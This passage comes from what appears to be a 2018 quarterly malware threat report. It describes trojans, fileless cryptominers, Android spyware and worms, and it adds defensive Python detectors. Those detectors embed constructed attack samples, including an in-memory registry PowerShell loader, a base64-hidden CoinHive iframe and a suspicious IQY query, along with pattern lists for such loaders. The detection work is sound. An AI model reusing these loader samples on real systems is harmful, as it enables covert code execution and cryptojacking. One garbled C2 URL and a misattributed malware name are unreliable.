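     "image_path": r"C:\Windows\SysWOW64\lanesviewer.exe"},
    {"type": "service_install", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
]

if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The service rule depends on the quality of the baseline, so it is best fed from an inventory of the fleet's installed services rather than a hand-typed list.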
And after that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning because it infects computers with popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on a legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief.
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see on the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest version of the malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software, Microsoft's this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
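Because an IQY file is plain text whose third line is the query URL, a mail gateway or attachment scanner can decode it and hold anything that queries a host outside an allowlist. The following is an added example, not code from the report or from Comodo; the sample files, the allowlist host intranet.example.com and the IP 203.0.113.10 (documentation range) are constructed.

```python
"""Parser and gateway check for Excel Internet Query (.iqy) attachments.
Added example, not Comodo's code. Samples and the allowlist are constructed."""
from urllib.parse import urlsplit

# Constructed allowlist of hosts from which Excel web queries are expected.
ALLOWED_HOSTS = {"intranet.example.com"}


def parse_iqy(text: str) -> dict:
    """Decode the IQY text layout: 'WEB', a version line, the query URL, then
    optional Key=Value option lines such as Selection= or Formatting=."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel web query file")
    options = {}
    for ln in lines[3:]:
        key, _, value = ln.partition("=")
        options[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "options": options}


def assess_iqy(text: str) -> list:
    """Return the reasons an IQY attachment should be held; empty means pass."""
    query = parse_iqy(text)
    url = urlsplit(query["url"])
    reasons = []
    if url.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme: {url.scheme or '<none>'}")
    if url.hostname is None or url.hostname not in ALLOWED_HOSTS:
        reasons.append(f"host not on allowlist: {url.hostname}")
    if url.scheme == "http":
        reasons.append("cleartext transport")
    if url.hostname and all(ch.isdigit() or ch == "." for ch in url.hostname):
        reasons.append("query points at a raw IP address")
    return reasons


# Constructed samples: an internal report query and a query to an external IP.
BENIGN_IQY = (
    "WEB\n"
    "1\n"
    "https://intranet.example.com/reports/sales.csv\n"
    "Selection=AllTables\n"
    "Formatting=None\n"
)
SUSPICIOUS_IQY = "WEB\n1\nhttp://203.0.113.10/query.dat\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_IQY), ("suspicious", SUSPICIOUS_IQY)):
        verdict = assess_iqy(sample)
        print(label, "PASS" if not verdict else "HOLD: " + "; ".join(verdict))
```

Excel also prompts before fetching the query, so the gateway check complements rather than replaces blocking the .iqy extension at the mail boundary where the business does not need it.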
Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
2.4 The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors to covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. Merging trojans as payloads and phishing emails as the means of delivery, as observed during Q2, will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.
[Chart: The growth of Flawed Ammyy attacks for Q2; monthly detections: Apr 43188, May 46382, Jun 48881]
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.
Earlier cryptomining examples were only able to use an infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: cryptominers would not steal information or destroy data like other malware, merely consuming CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than those required merely to mine cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash the user's system if an attempt is made to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on the victim machine but functions only in memory, making it much harder for antivirus software to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company turned to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
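A hunting routine for the decoding step just described (scheduled-task action, encoded PowerShell, registry-resident payload), written as an added example and not the report's or the BadShell sample's own code. It assumes the standard -EncodedCommand encoding (base64 over UTF-16LE); the indicator patterns are the author's heuristics and the task actions are constructed samples with placeholder registry paths.

```python
"""Triage of a scheduled-task action that launches an encoded PowerShell command.

Added example, not the report's own code or the BadShell sample. It assumes
the standard -EncodedCommand encoding (base64 of UTF-16LE text); the
indicator strings below are the author's assumptions about what a
registry-resident, in-memory loader looks like, and the task actions are
constructed samples with placeholder registry paths, not the real malware.
"""
import base64
import re

# Prefix forms PowerShell accepts for -EncodedCommand, followed by the base64 blob.
ENCODED_ARG = re.compile(r"(?<!\S)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Traits the report attributes to BadShell: the payload lives in the registry and is
# decoded and run in memory. Each pattern is a hunting heuristic, not a signature.
INDICATORS = {
    "reads_registry_value": re.compile(r"""Get-ItemProperty\s+(?:-Path\s+)?["']?HK(?:LM|CU)[:\\]""", re.I),
    "decodes_base64_payload": re.compile(r"\[Convert\]::FromBase64String", re.I),
    "invokes_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
}


def encode_powershell(script):
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script from an encoded PowerShell command line, or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64 / not UTF-16LE text


def analyze_task_action(cmdline):
    """Decode the action and count indicator hits; two or more hits is suspicious."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")   # flags may sit outside the blob
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return {"decoded": decoded, "hits": hits, "suspicious": len(hits) >= 2}


# Constructed samples. The registry path and value name are placeholders.
LOADER_SCRIPT = (
    "$b = (Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\PlaceholderVendor' -Name 'blob').blob\n"
    "IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($b)))"
)
LOADER_TASK_ACTION = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + encode_powershell(LOADER_SCRIPT)
)
BENIGN_TASK_ACTION = (
    "powershell.exe -NoProfile -enc "
    + encode_powershell("Get-Date | Out-File C:\\logs\\heartbeat.txt")
)

if __name__ == "__main__":
    for action in (LOADER_TASK_ACTION, BENIGN_TASK_ACTION):
        print(analyze_task_action(action))
```

On a live host the same function can be fed the Actions field of each task exported by the Task Scheduler, so the registry-resident loader is caught by what it does rather than by a file hash.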
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the company's financial losses were irreversible.
Invulnerability to antivirus software and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will crash the target system completely.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner occupies the victim's computer exclusively, using its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide. CoinHive is the brightest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make it as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we can find the familiar link to CoinHive.
The link to CoinHive
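A page-source check for exactly this camouflage (base64 blob that expands to a 1x1 iframe pointing at the cnhv.co shortener), written as an added example rather than code from the report. It treats cnhv.co and coinhive.com as the miner hosts the report names; the short-link path and the two sample pages are constructed placeholders, and no JavaScript is executed.

```python
"""Scan page source for a CoinHive loader hidden behind a base64 blob and a 1x1 iframe.

Added example, not code from the report. The miner hosts are the ones the report
names (the cnhv.co shortener and coinhive.com); the short-link path and the sample
pages are constructed placeholders. Assumes plain HTML, no JavaScript execution.
"""
import base64
import re
from urllib.parse import urlparse

MINER_HOSTS = {"coinhive.com", "cnhv.co"}

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
ATTRIBUTE = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def _pixels(value, default=100):
    """Turn '1', '1px' or '100%' into an int; unparsable values count as visible."""
    digits = re.sub(r"\D", "", value)
    return int(digits) if digits else default


def decoded_blobs(html):
    """Yield text recovered from base64-looking literals (what atob() would produce)."""
    for match in BASE64_RUN.finditer(html):
        try:
            yield base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # hashes, tokens and binary data are not what we are after


def hidden_iframes(markup):
    """Return (src, width, height) for iframes no larger than 1x1 pixel."""
    found = []
    for tag in IFRAME_TAG.findall(markup):
        attrs = {k.lower(): v for k, v in ATTRIBUTE.findall(tag)}
        width, height = _pixels(attrs.get("width", "")), _pixels(attrs.get("height", ""))
        if width <= 1 and height <= 1:
            found.append((attrs.get("src", ""), width, height))
    return found


def scan_page(html):
    """Report hidden iframes and miner script tags in the raw page and in decoded blobs."""
    findings = []
    sources = [("raw", html)] + [("decoded", blob) for blob in decoded_blobs(html)]
    for where, markup in sources:
        for src, width, height in hidden_iframes(markup):
            host = (urlparse(src).hostname or "").lower()
            findings.append({"kind": "hidden_iframe", "host": host, "where": where,
                             "known_miner": host in MINER_HOSTS})
        for src in SCRIPT_SRC.findall(markup):
            host = (urlparse(src).hostname or "").lower()
            if host in MINER_HOSTS:
                findings.append({"kind": "miner_script", "host": host, "where": where,
                                 "known_miner": True})
    return findings


# Constructed pages: the plainly visible loader and the camouflaged one.
VISIBLE_PAGE = '<html><body><script src="https://coinhive.com/lib/coinhive.min.js"></script></body></html>'
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1" frameborder="0"></iframe>'
CAMOUFLAGED_PAGE = (
    '<html><body><p>Welcome</p><script>document.write(atob("'
    + base64.b64encode(HIDDEN_IFRAME.encode("utf-8")).decode("ascii")
    + '"))</script></body></html>'
)

if __name__ == "__main__":
    for page in (VISIBLE_PAGE, CAMOUFLAGED_PAGE):
        print(scan_page(page))
```

A hidden iframe to an unknown host is still worth a look: the shortener can be changed at any time, so the 1x1 frame is the more durable indicator than the domain.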
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and numbers, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a weakness they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals the owner's account details (contacts, ID, name, phone numbers and email address). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server: httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to
the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الکویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the installed applications
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it delivers a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable the Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.
App distribution (the masks Stalker Spy wears): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android, CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, as you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp
Here are some commands from its Command and Control server:
contacts - Get contact details and email ID
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton,
شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
